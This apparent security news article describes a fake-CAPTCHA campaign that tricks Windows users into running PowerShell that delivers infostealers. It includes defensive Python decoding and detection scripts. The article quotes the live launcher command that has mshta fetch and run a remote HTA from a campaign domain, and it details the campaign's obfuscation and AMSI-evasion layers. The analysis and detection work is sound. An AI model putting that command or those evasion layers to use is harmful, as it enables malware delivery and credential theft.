A sophisticated malware campaign is targeting Windows users through deceptive CAPTCHA verification prompts that trick victims into executing malicious PowerShell scripts.
This resurgence of fake CAPTCHA attacks, identified in early February 2025, represents a growing threat as attackers continue to employ social engineering tactics to bypass security measures and compromise systems.
The attack begins when users encounter what appears to be a standard CAPTCHA verification on compromised or malicious websites.
However, instead of simply proving they are human, users are prompted to execute a PowerShell command that initiates a multi-stage infection process.
This command is disguised as part of the verification process, making it seem legitimate to unsuspecting users.
Researchers at Trustwave SpiderLabs noted this campaign during an Advanced Continual Threat Hunt (ACTH) investigation.
This attack chain ultimately delivers dangerous infostealers such as Lumma and Vidar, which are designed to steal sensitive information from compromised systems and maintain persistence.
When users execute the deceptive command, it launches a series of complex, encrypted PowerShell scripts.
The initial command appears as: powershell -NoProfile -Command "mshta https://pomppie.shop/RUKE.mp4 # 'I am not a robot - rëCAPTCHA Verification ID: 2188". Everything after the # is a PowerShell comment and is never executed; the fake "Verification ID" exists only so that the text the victim is told to run looks like part of the CAPTCHA check.
This seemingly innocent verification step actually downloads and executes an HTA file disguised with an MP4 extension: mshta fetches the remote file and runs it as an HTML Application regardless of its extension, so the .mp4 name is purely cosmetic.
The HTA file then triggers additional PowerShell scripts through a sophisticated multi-stage decryption process.
The malware employs a simple subtraction cipher where encrypted numerical values are reduced by 634 to reveal the original characters.
This decryption mechanism leads to further stages of PowerShell execution.
Advanced Evasion Techniques
The malware employs several techniques to evade detection. Researchers found that a later stage is XOR-obfuscated with the key "AMSI_RESULT_NOT_DETECTED" (the name of one of the AMSI_RESULT scan-outcome values), which keeps the decoded script out of sight of security tools until it is unpacked at runtime.
Moreover, the retrieved PowerShell scripts are intentionally large in file size, an apparent attempt to evade sandbox or emulation-based detection mechanisms that impose execution limits.
The final stages of the attack reveal the deployment of Lumma Stealer malware through Base64-encoded payloads.
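The three unpacking layers described above (the subtract-634 cipher, the repeating-key XOR with "AMSI_RESULT_NOT_DETECTED", and the Base64-encoded payload) can be peeled in sequence. The following is an added example written for this article, not code from Trustwave's report; the way the layers nest and the sample blob are assumptions constructed for the demonstration, so an analyst working on the real scripts would first extract each stage's data from the PowerShell text.

```python
"""Stage decoders for the obfuscation layers described above.

Added example; not code from the write-up or the campaign.
"""
import base64

SHIFT = 634                            # offset named in the write-up
XOR_KEY = b"AMSI_RESULT_NOT_DETECTED"  # key named in the write-up


def decode_subtraction(values):
    """Stage 1: each number is a character code plus 634; subtract and rebuild the text."""
    return "".join(chr(v - SHIFT) for v in values)


def xor_repeating_key(data, key=XOR_KEY):
    """Stage 2: repeating-key XOR. XOR is its own inverse, so this both encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_chain(stage1_values):
    """Peel all three layers and return the final payload as text.

    Layout ASSUMED for this example (the real scripts differ): the stage-1
    numbers decode to a hex string, the hex decodes to the XOR-ed blob, the
    XOR plaintext is Base64, and the Base64 body is the final payload.
    """
    hex_text = decode_subtraction(stage1_values)
    xored = bytes.fromhex(hex_text)
    b64 = xor_repeating_key(xored)
    return base64.b64decode(b64).decode("utf-8")


def build_sample(payload):
    """Wrap a plaintext in the same three layers so the decoder can be run offline.

    Constructed test data, not a campaign artefact.
    """
    b64 = base64.b64encode(payload.encode("utf-8"))
    xored = xor_repeating_key(b64)
    return [ord(c) + SHIFT for c in xored.hex()]


if __name__ == "__main__":
    # [706, 735, 742, 742, 745] is "Hello" shifted by 634 (constructed).
    print(decode_subtraction([706, 735, 742, 742, 745]))
    sample = build_sample("Write-Host 'final stage'")  # constructed
    print(decode_chain(sample))
```

The same function encodes and decodes the XOR layer because XOR with a fixed key is an involution; the only thing an analyst needs from the script is the key string, which here is sitting in plain text.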
The malware uses .NET reflection (the System.Reflection assembly-loading API) to load malicious assemblies directly into memory, so no executable has to be written to disk.
Further investigation confirmed that beyond data exfiltration, the malware downloads additional components including a Telegram bot-based HijackLoader and a Golang-based backdoor disguised as legitimate software like ‘TiVo Desktop’.
Security experts recommend implementing robust security awareness training and advanced endpoint protection solutions capable of detecting multi-stage PowerShell attacks to protect against these increasingly sophisticated threats.
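One concrete detection for the launcher stage is to triage process-creation telemetry for the traits visible in the command shown earlier: a remote URL handed to mshta, a downloaded file whose extension does not match the HTA content it carries, and a trailing PowerShell comment holding CAPTCHA-style lure text. The following is an added example, not detection content from Trustwave; the log records are constructed in Sysmon Event ID 1 style, and the assumption that a Win+R launch shows explorer.exe as the parent process is noted in the code.

```python
"""Process-creation triage for the fake-CAPTCHA launcher.

Added example; not from the write-up. Records below are constructed.
"""
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
MSHTA_RE = re.compile(r"\bmshta(?:\.exe)?\b", re.I)
# Everything after '#' is a PowerShell comment; the lure text lives there.
LURE_RE = re.compile(r"#.*?(not a robot|captcha|verification)", re.I)
HTA_EXTS = (".hta", ".htm", ".html")

# Constructed Sysmon-style records, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -NoProfile -Command \"mshta https://pomppie.shop/RUKE.mp4 "
                    "# 'I am not a robot - rëCAPTCHA Verification ID: 2188\""},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "mshta https://pomppie.shop/RUKE.mp4"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "powershell -NoProfile -File C:\\Scripts\\inventory.ps1"},
]


def score_event(ev):
    """Return the list of indicator names matched by one process-creation record."""
    cmd = ev["CommandLine"]
    hits = []
    url = URL_RE.search(cmd)
    if MSHTA_RE.search(cmd) and url:
        hits.append("mshta_remote_url")
        # mshta executes by content; a non-HTA extension is a disguise, not a limit.
        if not urlsplit(url.group(0)).path.lower().endswith(HTA_EXTS):
            hits.append("non_hta_extension")
    if LURE_RE.search(cmd):
        hits.append("captcha_lure_comment")
    # Assumption: text pasted into the Win+R box runs with explorer.exe as parent.
    if ev["ParentImage"].lower().endswith("explorer.exe") and "-noprofile" in cmd.lower():
        hits.append("interactive_noprofile_launch")
    return hits


def triage(events):
    """Return (image basename, hits) for every record matching at least one indicator."""
    out = []
    for ev in events:
        hits = score_event(ev)
        if hits:
            out.append((ev["Image"].rsplit("\\", 1)[-1], hits))
    return out


if __name__ == "__main__":
    for image, hits in triage(SAMPLE_EVENTS):
        print(image, hits)
```

The benign third record (a scheduled inventory script) produces no hits, while the lure command trips every indicator; in practice the lure-comment and non-HTA-extension checks carry most of the signal, since mshta fetching a remote URL also occurs in some legitimate but rare administrative tooling.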